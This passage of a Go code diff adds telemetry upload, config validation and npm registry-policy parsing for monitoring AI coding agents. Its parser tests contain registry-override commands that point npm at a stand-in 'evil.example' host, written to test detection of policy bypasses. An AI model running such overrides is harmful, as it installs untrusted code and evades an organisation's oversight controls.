"subham@stepsecurity.io" { + t.Errorf("UserIdentity = %q, want subham@stepsecurity.io (from USER_EMAIL)", got.UserIdentity) + } +} + +func TestResolve_PassesUnknownThrough(t *testing.T) { + // No stubs registered for ioreg / sw_vers / system_profiler — Mock.Run + // returns errors for unstubbed commands, which device.Gather translates + // to its `"unknown"` sentinel. The shim must not rewrite that. + mock := executor.NewMock() + mock.SetGOOS("darwin") + // Don't set USER_EMAIL etc. — and Mock.LoggedInUser falls back to + // CurrentUser which has username "testuser" by default. Override that + // path so we land on `"unknown"` for UserIdentity too. + mock.SetUsername("") + + got := Resolve(context.Background(), mock, "cust-42") + + if got.DeviceID != "unknown" { + t.Errorf("DeviceID = %q, want %q", got.DeviceID, "unknown") + } + // UserIdentity falls back through env vars then LoggedInUser; with + // empty env and empty username, expect "unknown" or "" — accept either, + // since the contract is "don't synthesize, pass through what device + // returns." device.Gather returns the empty username here, not + // "unknown", so we just assert the shim didn't replace it. + if got.UserIdentity != "" && got.UserIdentity != "unknown" { + t.Errorf("UserIdentity = %q, want passthrough of what device.Gather emits (\"\" or \"unknown\")", + got.UserIdentity) + } +} + +func TestResolve_HungExecutorTimesOutWithin1s(t *testing.T) { + mock := executor.NewMock() + mock.SetGOOS("darwin") + hung := &hangingExec{Mock: mock} + + parent, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + start := time.Now() + got := Resolve(parent, hung, "cust-42") + elapsed := time.Since(start) + + // Allow generous slack for CI noise but hard-cap at 1.5s — well under + // the 15s hook budget. If this ever drifts, the hot path is at risk. + if elapsed > 1500*time.Millisecond { + t.Errorf("Resolve took %s under hung executor, want < 1.5s (probe timeout is 1s)", elapsed) + } + if elapsed < 900*time.Millisecond { + // The probe should have actually run, not bailed instantly. + t.Errorf("Resolve took %s, expected ~1s (probe timeout)", elapsed) + } + + // With every Run call hung-then-cancelled, device.Gather returns its + // "unknown" sentinel — confirm the shim passes it through. + if got.DeviceID != "unknown" { + t.Errorf("DeviceID under hung exec = %q, want %q", got.DeviceID, "unknown") + } + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want passthrough cust-42", got.CustomerID) + } +} + +// Compile-time check: hangingExec must satisfy executor.Executor so that +// device.Gather (which takes the interface) can call it. If the interface +// grows a method we don't override, the embedded Mock fills it in. +var _ executor.Executor = (*hangingExec)(nil) + +func TestResolve_HappyPath_Linux(t *testing.T) { + // Cross-platform parity pin. Darwin happy path is already covered; + // this mirrors it on Linux so a regression in Linux device probes + // (e.g., serial-number lookup) fails here, not in production. + mock := executor.NewMock() + mock.SetGOOS("linux") + mock.SetUsername("svc-deploy") + mock.SetFile("/sys/class/dmi/id/product_serial", []byte("LINUX-SERIAL-456\n")) + mock.SetFile("/etc/os-release", []byte("NAME=\"Ubuntu\"\nVERSION_ID=\"24.04\"\n")) + mock.SetFile("/proc/sys/kernel/osrelease", []byte("6.8.0-45-generic\n")) + + got := Resolve(context.Background(), mock, "cust-42") + + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want cust-42", got.CustomerID) + } + if got.DeviceID != "LINUX-SERIAL-456" { + t.Errorf("DeviceID = %q, want LINUX-SERIAL-456 (from /sys/class/dmi)", got.DeviceID) + } + if got.UserIdentity != "svc-deploy" { + t.Errorf("UserIdentity = %q, want svc-deploy (from username)", got.UserIdentity) + } +} + +func TestResolve_EmptyCustomerIDPassedThrough(t *testing.T) { + // identity.Resolve does NOT validate customerID — that's ingest.Snapshot's + // job. Pin the boundary: an empty customerID must reach Info untouched. + mock := executor.NewMock() + mock.SetGOOS("darwin") + + got := Resolve(context.Background(), mock, "") + if got.CustomerID != "" { + t.Errorf("CustomerID = %q, want empty pass-through", got.CustomerID) + } +} + +func TestResolve_DoesNotCancelParentContext(t *testing.T) { + // The 1s probe ctx is created with WithTimeout off the parent ctx. + // Cancelling the probe ctx must not propagate up — the caller's + // parent ctx is the hook runtime's overall budget and other stages + // (enrich, policy, upload) need it to remain valid after Resolve. + mock := executor.NewMock() + mock.SetGOOS("darwin") + hung := &hangingExec{Mock: mock} + + parent, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + _ = Resolve(parent, hung, "cust-42") + + if err := parent.Err(); err != nil { + t.Errorf("parent ctx unexpectedly errored after Resolve: %v", err) + } + select { + case <-parent.Done(): + t.Error("parent ctx Done channel fired — probe ctx cancel leaked upward") + default: + } +} diff --git a/internal/aiagents/ingest/client.go b/internal/aiagents/ingest/client.go new file mode 100644 index 0000000..3cfee25 --- /dev/null +++ b/internal/aiagents/ingest/client.go @@ -0,0 +1,112 @@ +package ingest + +import ( + "bytes" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "net/url" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" + "github.com/step-security/dev-machine-guard/internal/buildinfo" +) + +// DefaultHookUploadTimeout caps how long the hot path will wait on the +// backend per hook invocation. Each hook is a fresh process, so every +// upload pays a cold TCP+TLS handshake; tighter caps proved fragile +// under load. Past this, the right answer is an async sidecar approach, +// not a bigger sync timeout. +const DefaultHookUploadTimeout = 5 * time.Second + +// maxErrorBody bounds how much of a non-success response body the +// client reads into error messages, capping the redacted error log. +const maxErrorBody = 1024 + +// Client posts events to a single configured endpoint. Safe to share +// across goroutines; the underlying *http.Client carries connection +// state. +type Client struct { + endpoint string + apiKey string + http *http.Client +} + +// New returns a client when the supplied Config has all enterprise +// credentials present and non-placeholder. The bool is false when no +// upload should be attempted; callers MUST treat that as a no-op rather +// than an error. The gate matches Snapshot's: trims surrounding +// whitespace, then rejects empty values and `{{...}}` placeholders. +// New owns the gate so a caller passing a hand-built Config (not the +// product of Snapshot) cannot bypass it. +func New(cfg Config, h *http.Client) (*Client, bool) { + customer := strings.TrimSpace(cfg.CustomerID) + endpoint := strings.TrimSpace(cfg.APIEndpoint) + apiKey := strings.TrimSpace(cfg.APIKey) + if !valid(customer) || !valid(endpoint) || !valid(apiKey) { + return nil, false + } + if h == nil { + h = &http.Client{Timeout: DefaultHookUploadTimeout} + } + return &Client{ + endpoint: strings.TrimRight(endpoint, "/"), + apiKey: apiKey, + http: h, + }, true +} + +// UploadEvents POSTs events to /v1/{customer_id}/ai-agents/events as a +// raw JSON array. Each event already carries its own schema_version, +// identity, and policy fields, so no envelope wraps the array — the +// backend reads the indexed columns directly from each event. +// +// Statuses 200, 201, 202, and 409 are treated as success. 409 is +// success because backend ingestion is idempotent on +// (device_id, event_id); duplicate retries must not become client +// errors. +func (c *Client) UploadEvents(ctx context.Context, customerID string, events []event.Event) error { + if c == nil { + return errors.New("ingest: nil client") + } + if strings.TrimSpace(customerID) == "" { + return errors.New("ingest: empty customer_id") + } + + // Copy by value so any later mutation of the caller's events cannot + // race the in-flight request body. + body, err := json.Marshal(append([]event.Event(nil), events...)) + if err != nil { + return fmt.Errorf("ingest: marshal events: %w", err) + } + + endpoint := c.endpoint + "/v1/" + url.PathEscape(customerID) + "/ai-agents/events" + req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(body)) + if err != nil { + return fmt.Errorf("ingest: build request: %w", err) + } + req.Header.Set("Authorization", "Bearer "+c.apiKey) + req.Header.Set("Content-Type", "application/json") + req.Header.Set("User-Agent", "dmg/"+buildinfo.Version) + + resp, err := c.http.Do(req) + if err != nil { + return fmt.Errorf("ingest: transport: %s", redact.String(err.Error())) + } + defer resp.Body.Close() + + switch resp.StatusCode { + case http.StatusOK, http.StatusCreated, http.StatusAccepted, http.StatusConflict: + _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, maxErrorBody)) + return nil + } + + snippet, _ := io.ReadAll(io.LimitReader(resp.Body, maxErrorBody)) + return fmt.Errorf("ingest: unexpected status %d: %s", + resp.StatusCode, redact.String(strings.TrimSpace(string(snippet)))) +} diff --git a/internal/aiagents/ingest/client_test.go b/internal/aiagents/ingest/client_test.go new file mode 100644 index 0000000..c584646 --- /dev/null +++ b/internal/aiagents/ingest/client_test.go @@ -0,0 +1,256 @@ +package ingest + +import ( + "context" + "encoding/json" + "errors" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +func okClientConfig() Config { + return Config{ + CustomerID: "cus_123", + APIEndpoint: "https://dmg.example.com", + APIKey: "sk_secret_value", + } +} + +func TestNewDisabledWhenAnyFieldMissing(t *testing.T) { + cases := []struct { + name string + cfg Config + }{ + {"empty", Config{}}, + {"missing key", Config{CustomerID: "c", APIEndpoint: "https://x"}}, + {"missing endpoint", Config{CustomerID: "c", APIKey: "k"}}, + {"missing customer", Config{APIEndpoint: "https://x", APIKey: "k"}}, + {"placeholder key", Config{CustomerID: "c", APIEndpoint: "https://x", APIKey: "{{API_KEY}}"}}, + {"placeholder endpoint", Config{CustomerID: "c", APIEndpoint: "{{API_ENDPOINT}}", APIKey: "k"}}, + {"placeholder customer", Config{CustomerID: "{{CUSTOMER_ID}}", APIEndpoint: "https://x", APIKey: "k"}}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + c, ok := New(tc.cfg, nil) + if ok || c != nil { + t.Errorf("expected disabled client, got ok=%v c=%v", ok, c) + } + }) + } +} + +func TestNewEnabledWithFullConfig(t *testing.T) { + c, ok := New(okClientConfig(), nil) + if !ok || c == nil { + t.Fatal("expected enabled client") + } +} + +// New owns the same trim+placeholder gate as Snapshot. A caller that +// constructs Config{} by hand (rather than via Snapshot) must not be +// able to slip whitespace-only credentials past New. +func TestNewRejectsWhitespaceOnlyFields(t *testing.T) { + cases := []struct { + name string + cfg Config + }{ + {"whitespace customer", Config{CustomerID: " ", APIEndpoint: "https://x", APIKey: "k"}}, + {"whitespace endpoint", Config{CustomerID: "c", APIEndpoint: "\t\n", APIKey: "k"}}, + {"whitespace key", Config{CustomerID: "c", APIEndpoint: "https://x", APIKey: " "}}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + c, ok := New(tc.cfg, nil) + if ok || c != nil { + t.Errorf("expected disabled client on whitespace-only field, got ok=%v", ok) + } + }) + } +} + +// roundTripFn is an http.RoundTripper backed by a function. Tests use +// it to inspect the outgoing request without spinning up a real +// listener for every assertion. +type roundTripFn func(*http.Request) (*http.Response, error) + +func (f roundTripFn) RoundTrip(r *http.Request) (*http.Response, error) { return f(r) } + +func TestUploadEventsRequestShape(t *testing.T) { + var got *http.Request + var gotBody []byte + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + got = r + body, _ := io.ReadAll(r.Body) + gotBody = body + return &http.Response{ + StatusCode: http.StatusAccepted, + Body: io.NopCloser(strings.NewReader("")), + Header: make(http.Header), + }, nil + }) + + cfg := okClientConfig() + cfg.APIEndpoint = "https://dmg.example.com/" // trailing slash on purpose + c, ok := New(cfg, &http.Client{Transport: rt}) + if !ok { + t.Fatal("client disabled") + } + + ev := event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: "abc", + Timestamp: time.Now().UTC(), + AgentName: "claude-code", + HookEvent: event.HookPreToolUse, + ResultStatus: event.ResultObserved, + CustomerID: "cus_123", + DeviceID: "C02ABCD1234", + UserIdentity: "alice@example.com", + } + if err := c.UploadEvents(context.Background(), "cus_123", []event.Event{ev}); err != nil { + t.Fatalf("UploadEvents: %v", err) + } + + if got.Method != http.MethodPost { + t.Errorf("method=%s want POST", got.Method) + } + if got.URL.String() != "https://dmg.example.com/v1/cus_123/ai-agents/events" { + t.Errorf("url=%s — want /v1/cus_123/ai-agents/events", got.URL) + } + if h := got.Header.Get("Authorization"); h != "Bearer sk_secret_value" { + t.Errorf("Authorization header=%q", h) + } + if h := got.Header.Get("Content-Type"); h != "application/json" { + t.Errorf("Content-Type header=%q", h) + } + if h := got.Header.Get("User-Agent"); !strings.HasPrefix(h, "dmg/") { + t.Errorf("User-Agent header=%q — want dmg/", h) + } + + // Body must be a raw JSON array — no envelope. + var arr []map[string]any + if err := json.Unmarshal(gotBody, &arr); err != nil { + t.Fatalf("body not a JSON array: %v: %q", err, gotBody) + } + if len(arr) != 1 { + t.Fatalf("expected 1 event in array, got %d: %v", len(arr), arr) + } + first := arr[0] + for _, key := range []string{"event_id", "customer_id", "device_id", "user_identity"} { + if v, ok := first[key]; !ok || v == "" { + t.Errorf("array[0].%s missing or empty: %v", key, first[key]) + } + } + if first["event_id"] != "abc" || first["customer_id"] != "cus_123" { + t.Errorf("array[0] identity fields mismatched: %v", first) + } +} + +func TestUploadEventsURLEscapesCustomerID(t *testing.T) { + var gotURL string + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + gotURL = r.URL.String() + return &http.Response{ + StatusCode: http.StatusAccepted, + Body: io.NopCloser(strings.NewReader("")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: rt}) + if err := c.UploadEvents(context.Background(), "cus/with slash", []event.Event{{}}); err != nil { + t.Fatalf("UploadEvents: %v", err) + } + if !strings.Contains(gotURL, "/v1/cus%2Fwith%20slash/ai-agents/events") { + t.Errorf("customer_id not URL-escaped: %s", gotURL) + } +} + +func TestUploadEventsRejectsEmptyCustomerID(t *testing.T) { + c, _ := New(okClientConfig(), &http.Client{}) + if err := c.UploadEvents(context.Background(), " ", []event.Event{{}}); err == nil { + t.Error("expected error for empty customer_id") + } +} + +func TestUploadEventsSuccessStatuses(t *testing.T) { + for _, status := range []int{http.StatusOK, http.StatusCreated, http.StatusAccepted, http.StatusConflict} { + t.Run(http.StatusText(status), func(t *testing.T) { + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: status, + Body: io.NopCloser(strings.NewReader("ok")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: rt}) + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err != nil { + t.Errorf("status %d treated as failure: %v", status, err) + } + }) + } +} + +func TestUploadEvents500ReturnsErrorWithoutAPIKey(t *testing.T) { + rt := roundTripFn(func(r *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusInternalServerError, + Body: io.NopCloser(strings.NewReader("internal explosion")), + Header: make(http.Header), + }, nil + }) + c, _ := New(okClientConfig(), &http.Client{Transport: rt}) + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err == nil { + t.Fatal("expected error for 500") + } + if strings.Contains(err.Error(), "sk_secret_value") { + t.Errorf("API key leaked into error: %v", err) + } + if !strings.Contains(err.Error(), "500") { + t.Errorf("error does not mention status code: %v", err) + } +} + +func TestUploadEventsContextCancellation(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + <-r.Context().Done() + })) + defer srv.Close() + + cfg := okClientConfig() + cfg.APIEndpoint = srv.URL + c, _ := New(cfg, srv.Client()) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + start := time.Now() + err := c.UploadEvents(ctx, "cus_123", []event.Event{{}}) + if err == nil { + t.Fatal("expected error from canceled context") + } + if !errors.Is(err, context.Canceled) && !strings.Contains(err.Error(), "context canceled") { + t.Errorf("expected context cancellation in error, got %v", err) + } + if d := time.Since(start); d > time.Second { + t.Errorf("cancel did not return promptly: %v", d) + } +} + +// Nil receiver is a fail-open contract: a runtime that disabled upload +// (no Client constructed) must not panic if it accidentally calls into +// a nil client. +func TestUploadEventsNilReceiver(t *testing.T) { + var c *Client + err := c.UploadEvents(context.Background(), "cus_123", []event.Event{{}}) + if err == nil { + t.Error("expected error from nil receiver") + } +} diff --git a/internal/aiagents/ingest/config.go b/internal/aiagents/ingest/config.go new file mode 100644 index 0000000..9015634 --- /dev/null +++ b/internal/aiagents/ingest/config.go @@ -0,0 +1,48 @@ +// Package ingest owns the AI-agent telemetry upload path: the stricter +// enterprise-config gate (this file) and the HTTP client that POSTs +// events to /v1/{customer_id}/ai-agents/events. +// +// The stricter gate exists because DMG's `config.IsEnterpriseMode()` +// checks only APIKey — that's the right call for the scan/telemetry +// paths, but it's too lax for the hook upload path. A missing CustomerID +// or APIEndpoint here would silently misroute uploads, so we require all +// three credentials to be present and not bearing build-time +// `{{...}}` placeholders. +package ingest + +import ( + "strings" + + "github.com/step-security/dev-machine-guard/internal/config" +) + +// Config is a snapshot of the three credentials required to upload +// AI-agent events. All fields are TrimSpace'd at read time. +type Config struct { + CustomerID string + APIEndpoint string + APIKey string +} + +// Snapshot reads the current process-wide DMG config (populated by an +// earlier call to config.Load) and returns it alongside an "enterprise +// ready" bool. The bool is true iff every field is non-empty after +// trimming AND none contain the build-time placeholder marker `{{`. +// +// The returned Config is always populated for diagnostics — callers +// should NOT use its values when ok is false. +func Snapshot() (Config, bool) { + c := Config{ + CustomerID: strings.TrimSpace(config.CustomerID), + APIEndpoint: strings.TrimSpace(config.APIEndpoint), + APIKey: strings.TrimSpace(config.APIKey), + } + if !valid(c.CustomerID) || !valid(c.APIEndpoint) || !valid(c.APIKey) { + return c, false + } + return c, true +} + +func valid(v string) bool { + return v != "" && !strings.Contains(v, "{{") +} diff --git a/internal/aiagents/ingest/config_test.go b/internal/aiagents/ingest/config_test.go new file mode 100644 index 0000000..bd7b314 --- /dev/null +++ b/internal/aiagents/ingest/config_test.go @@ -0,0 +1,119 @@ +package ingest + +import ( + "testing" + + "github.com/step-security/dev-machine-guard/internal/config" +) + +// withConfig stages the DMG config globals for one test case and restores +// them on cleanup. The DMG config package is package-level mutable, so +// tests must restore-on-exit to stay independent. +func withConfig(t *testing.T, customerID, apiEndpoint, apiKey string) { + t.Helper() + prevCustomer, prevEndpoint, prevKey := config.CustomerID, config.APIEndpoint, config.APIKey + t.Cleanup(func() { + config.CustomerID = prevCustomer + config.APIEndpoint = prevEndpoint + config.APIKey = prevKey + }) + config.CustomerID = customerID + config.APIEndpoint = apiEndpoint + config.APIKey = apiKey +} + +func TestSnapshot_AllValid(t *testing.T) { + withConfig(t, "cust-123", "https://api.stepsecurity.io", "sk_live_abc") + + cfg, ok := Snapshot() + if !ok { + t.Fatal("expected ok=true with all three fields populated") + } + if cfg.CustomerID != "cust-123" || cfg.APIEndpoint != "https://api.stepsecurity.io" || cfg.APIKey != "sk_live_abc" { + t.Errorf("unexpected snapshot: %+v", cfg) + } +} + +func TestSnapshot_RejectsPlaceholders(t *testing.T) { + cases := []struct { + name, customer, endpoint, key string + }{ + {"placeholder customer", "{{CUSTOMER_ID}}", "https://api.example.com", "sk_live_abc"}, + {"placeholder endpoint", "cust-123", "{{API_ENDPOINT}}", "sk_live_abc"}, + {"placeholder key", "cust-123", "https://api.example.com", "{{API_KEY}}"}, + {"all placeholders", "{{CUSTOMER_ID}}", "{{API_ENDPOINT}}", "{{API_KEY}}"}, + {"partial placeholder", "cust-123", "https://api.{{HOST}}.io", "sk_live_abc"}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + withConfig(t, tc.customer, tc.endpoint, tc.key) + if _, ok := Snapshot(); ok { + t.Errorf("expected ok=false on placeholder, got true") + } + }) + } +} + +func TestSnapshot_RejectsEmpty(t *testing.T) { + cases := []struct { + name, customer, endpoint, key string + }{ + {"empty customer", "", "https://api.example.com", "sk_live_abc"}, + {"empty endpoint", "cust-123", "", "sk_live_abc"}, + {"empty key", "cust-123", "https://api.example.com", ""}, + {"all empty", "", "", ""}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + withConfig(t, tc.customer, tc.endpoint, tc.key) + if _, ok := Snapshot(); ok { + t.Errorf("expected ok=false on empty field, got true") + } + }) + } +} + +func TestSnapshot_RejectsWhitespaceOnly(t *testing.T) { + withConfig(t, " ", "\t\n", " ") + if _, ok := Snapshot(); ok { + t.Error("expected ok=false on whitespace-only fields") + } +} + +func TestSnapshot_TrimsSurroundingWhitespace(t *testing.T) { + withConfig(t, " cust-123 ", "\thttps://api.example.com\n", " sk_live_abc ") + cfg, ok := Snapshot() + if !ok { + t.Fatal("expected ok=true after trimming") + } + if cfg.CustomerID != "cust-123" || cfg.APIEndpoint != "https://api.example.com" || cfg.APIKey != "sk_live_abc" { + t.Errorf("expected trimmed values, got %+v", cfg) + } +} + +func TestSnapshot_AcceptsSingleBrace(t *testing.T) { + // The placeholder marker is `{{` (double brace) per the build-time + // substitution scheme. A single `{` is a legitimate URL/token char + // (e.g., a query template var) and must NOT trip the gate. + withConfig(t, "cust-{abc}", "https://api.example.com/v1?ctx={ts}", "sk_live_abc") + cfg, ok := Snapshot() + if !ok { + t.Fatal("expected ok=true; single-brace inputs should pass the placeholder gate") + } + if cfg.CustomerID != "cust-{abc}" { + t.Errorf("single-brace value mutated: %q", cfg.CustomerID) + } +} + +func TestSnapshot_PopulatesEvenWhenInvalid(t *testing.T) { + // Diagnostics need access to whatever the user did configure, even when + // the gate refuses. Confirm Config is not zero-valued on the false path. + withConfig(t, "cust-123", "", "sk_live_abc") + cfg, ok := Snapshot() + if ok { + t.Fatal("expected ok=false (empty endpoint)") + } + if cfg.CustomerID != "cust-123" || cfg.APIKey != "sk_live_abc" { + t.Errorf("expected populated diagnostic snapshot, got %+v", cfg) + } +} diff --git a/internal/aiagents/policy/builtin/policy.json b/internal/aiagents/policy/builtin/policy.json new file mode 100644 index 0000000..029b7ac --- /dev/null +++ b/internal/aiagents/policy/builtin/policy.json @@ -0,0 +1,12 @@ +{ + "version": 1, + "mode": "audit", + "ecosystems": { + "npm": { + "enabled": true, + "registry": { + "allowlist": ["https://registry.stepsecurity.io/"] + } + } + } +} diff --git a/internal/aiagents/policy/bypass.go b/internal/aiagents/policy/bypass.go new file mode 100644 index 0000000..ed1bef1 --- /dev/null +++ b/internal/aiagents/policy/bypass.go @@ -0,0 +1,141 @@ +package policy + +import ( + "strings" + + "github.com/google/shlex" +) + +// ParsedCommand is the pre-policy view of a shell argv: the leading +// `KEY=VAL` env, the package manager binary, the residual args, plus the +// flags we care about. +type ParsedCommand struct { + InlineEnv map[string]string + Binary string + Args []string + RegistryFlag string + UserconfigFlag string + // ConfigOp is "" unless argv looks like ` config ...`. + ConfigOp string + ConfigKey string + ConfigValue string +} + +// ParseShell tokenizes cmd and pulls out the pieces the policy evaluator +// cares about. Unknown commands return Binary="" and the caller should +// treat the parse as a no-op. +func ParseShell(cmd string) ParsedCommand { + tokens, err := shlex.Split(cmd) + if err != nil || len(tokens) == 0 { + tokens = strings.Fields(cmd) + if len(tokens) == 0 { + return ParsedCommand{} + } + } + out := ParsedCommand{InlineEnv: map[string]string{}} + for len(tokens) > 0 { + t := tokens[0] + if t == "env" { + tokens = tokens[1:] + continue + } + if eq := strings.IndexByte(t, '='); eq > 0 && !strings.HasPrefix(t, "-") { + key := t[:eq] + if isShellIdent(key) { + out.InlineEnv[key] = t[eq+1:] + tokens = tokens[1:] + continue + } + } + break + } + if len(tokens) == 0 { + return out + } + bin := tokens[0] + if idx := strings.LastIndexByte(bin, '/'); idx >= 0 { + bin = bin[idx+1:] + } + out.Binary = bin + out.Args = tokens[1:] + + out.RegistryFlag = extractFlagValue(out.Args, "--registry") + out.UserconfigFlag = extractFlagValue(out.Args, "--userconfig") + + if op, key, val, ok := extractConfigOp(out.Args); ok { + out.ConfigOp = op + out.ConfigKey = key + out.ConfigValue = val + } + return out +} + +// extractFlagValue finds `--flag=value` or `--flag value` and returns value. +func extractFlagValue(args []string, flag string) string { + for i, a := range args { + if a == flag && i+1 < len(args) { + return args[i+1] + } + if v, ok := strings.CutPrefix(a, flag+"="); ok { + return v + } + } + return "" +} + +// extractConfigOp recognizes `config set `, `config delete `, or +// `config edit`. Returns ("set"|"delete"|"edit", key, value, true). +// pnpm uses `pnpm config set`, yarn uses `yarn config set`, etc. +func extractConfigOp(args []string) (op, key, value string, ok bool) { + // Skip leading flags before the "config" subcommand. + i := 0 + for i < len(args) && strings.HasPrefix(args[i], "-") { + // Skip values for known value-bearing flags. + if eq := strings.IndexByte(args[i], '='); eq < 0 { + if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") { + i++ + } + } + i++ + } + if i >= len(args) || args[i] != "config" { + return "", "", "", false + } + i++ + if i >= len(args) { + return "", "", "", false + } + switch args[i] { + case "set": + if i+2 < len(args) { + return "set", args[i+1], args[i+2], true + } + if i+1 < len(args) { + return "set", args[i+1], "", true + } + case "delete", "rm": + if i+1 < len(args) { + return "delete", args[i+1], "", true + } + case "edit": + return "edit", "", "", true + } + return "", "", "", false +} + +func isShellIdent(s string) bool { + if s == "" { + return false + } + for i, r := range s { + switch { + case r >= 'A' && r <= 'Z': + case r >= 'a' && r <= 'z': + case r == '_': + case i > 0 && r >= '0' && r <= '9': + default: + return false + } + } + return true +} diff --git a/internal/aiagents/policy/bypass_test.go b/internal/aiagents/policy/bypass_test.go new file mode 100644 index 0000000..3452cad --- /dev/null +++ b/internal/aiagents/policy/bypass_test.go @@ -0,0 +1,82 @@ +package policy + +import "testing" + +func TestParseShellExtractsRegistryFlag(t *testing.T) { + for _, in := range []string{ + "npm install --registry=https://evil.example/ lodash", + "npm install --registry https://evil.example/ lodash", + } { + got := ParseShell(in) + if got.Binary != "npm" { + t.Errorf("%q: bin %s", in, got.Binary) + } + if got.RegistryFlag != "https://evil.example/" { + t.Errorf("%q: registry %s", in, got.RegistryFlag) + } + } +} + +func TestParseShellExtractsUserconfig(t *testing.T) { + got := ParseShell("npm install --userconfig=/tmp/x.npmrc") + if got.UserconfigFlag != "/tmp/x.npmrc" { + t.Errorf("userconfig: %s", got.UserconfigFlag) + } +} + +func TestParseShellExtractsInlineEnv(t *testing.T) { + got := ParseShell("NPM_CONFIG_REGISTRY=https://evil.example/ DEBUG=1 npm install") + if got.InlineEnv["NPM_CONFIG_REGISTRY"] != "https://evil.example/" { + t.Errorf("env NPM_CONFIG_REGISTRY: %v", got.InlineEnv) + } + if got.InlineEnv["DEBUG"] != "1" { + t.Errorf("env DEBUG: %v", got.InlineEnv) + } + if got.Binary != "npm" { + t.Errorf("bin: %s", got.Binary) + } +} + +func TestParseShellHandlesEnvPrefix(t *testing.T) { + got := ParseShell("env NPM_CONFIG_REGISTRY=https://evil.example/ npm install") + if got.InlineEnv["NPM_CONFIG_REGISTRY"] != "https://evil.example/" { + t.Errorf("env: %v", got.InlineEnv) + } + if got.Binary != "npm" { + t.Errorf("bin: %s", got.Binary) + } +} + +func TestParseShellRecognizesConfigSet(t *testing.T) { + got := ParseShell("npm config set registry https://evil.example/") + if got.ConfigOp != "set" { + t.Errorf("op: %s", got.ConfigOp) + } + if got.ConfigKey != "registry" || got.ConfigValue != "https://evil.example/" { + t.Errorf("key/value: %s %s", got.ConfigKey, got.ConfigValue) + } +} + +func TestParseShellRecognizesConfigDelete(t *testing.T) { + got := ParseShell("npm config delete registry") + if got.ConfigOp != "delete" || got.ConfigKey != "registry" { + t.Errorf("op/key: %s %s", got.ConfigOp, got.ConfigKey) + } +} + +func TestParseShellRecognizesConfigEdit(t *testing.T) { + got := ParseShell("npm config edit") + if got.ConfigOp != "edit" { + t.Errorf("op: %s", got.ConfigOp) + } +} + +func TestParseShellPathPrefixedBinaryStripped(t *testing.T) { + got := ParseShell("/usr/local/bin/pnpm install --registry=https://x/") + if got.Binary != "pnpm" { + t.Errorf("bin: %s", got.Binary) + } + if got.RegistryFlag != "https://x/" { + t.Errorf("registry: %s", got.RegistryFlag) + } +} diff --git a/internal/aiagents/policy/decision.go b/internal/aiagents/policy/decision.go new file mode 100644 index 0000000..6fd8766 --- /dev/null +++ b/internal/aiagents/policy/decision.go @@ -0,0 +1,48 @@ +package policy + +// DecisionCode names a structured reason. Codes go to the JSONL audit +// record; the agent only sees Decision.UserMessage, which is intentionally +// generic. +type DecisionCode string + +const ( + CodeAllowed DecisionCode = "allowed" + CodeRegistryNotAllowed DecisionCode = "registry_not_allowed" + CodeRegistryFlag DecisionCode = "registry_flag_override" + CodeRegistryEnv DecisionCode = "registry_env_override" + CodeUserconfigFlag DecisionCode = "userconfig_override" + CodeManagedKeyMutation DecisionCode = "managed_key_mutation" + CodeManagedKeyEdit DecisionCode = "managed_key_edit" + CodeInsufficientData DecisionCode = "insufficient_data" + CodePolicyDisabled DecisionCode = "policy_disabled" + CodeNotInstallCommand DecisionCode = "not_install_command" +) + +// GenericBlockMessage is the literal phrase shown to the agent on any +// block. It does not name files, registries, or packages — that detail +// goes to JSONL only, so the agent cannot guide the user to a bypass. +const GenericBlockMessage = "Blocked by your organization's administrator." + +// Decision is the evaluator's output. Adapters consume only Allow and +// UserMessage; Code and InternalDetail are JSONL-only. +type Decision struct { + Allow bool + Code DecisionCode + UserMessage string + InternalDetail string +} + +// AllowDecision builds an explicit allow decision with the given code. +func AllowDecision(code DecisionCode, detail string) Decision { + return Decision{Allow: true, Code: code, InternalDetail: detail} +} + +// BlockDecision builds a block decision with the generic user message. +func BlockDecision(code DecisionCode, detail string) Decision { + return Decision{ + Allow: false, + Code: code, + UserMessage: GenericBlockMessage, + InternalDetail: detail, + } +} diff --git a/internal/aiagents/policy/ecosystem.go b/internal/aiagents/policy/ecosystem.go new file mode 100644 index 0000000..653a423 --- /dev/null +++ b/internal/aiagents/policy/ecosystem.go @@ -0,0 +1,42 @@ +package policy + +// Ecosystem names a language family the runtime can enforce policy on. +// One ecosystem subsumes multiple package-manager binaries (e.g. npm, +// pnpm, yarn, and bun all live under EcosystemNPM). Future entries: +// pypi, cargo, go. +type Ecosystem string + +const ( + EcosystemNPM Ecosystem = "npm" +) + +// EcosystemFor maps an observed PM binary to its ecosystem. It returns "" +// when the binary does not belong to any ecosystem the runtime enforces +// today; callers treat that as "not policy-relevant" and fall through to +// allow. +// +// This is the single binary→ecosystem dispatch in the codebase; do not +// reproduce the table elsewhere. +func EcosystemFor(binary string) Ecosystem 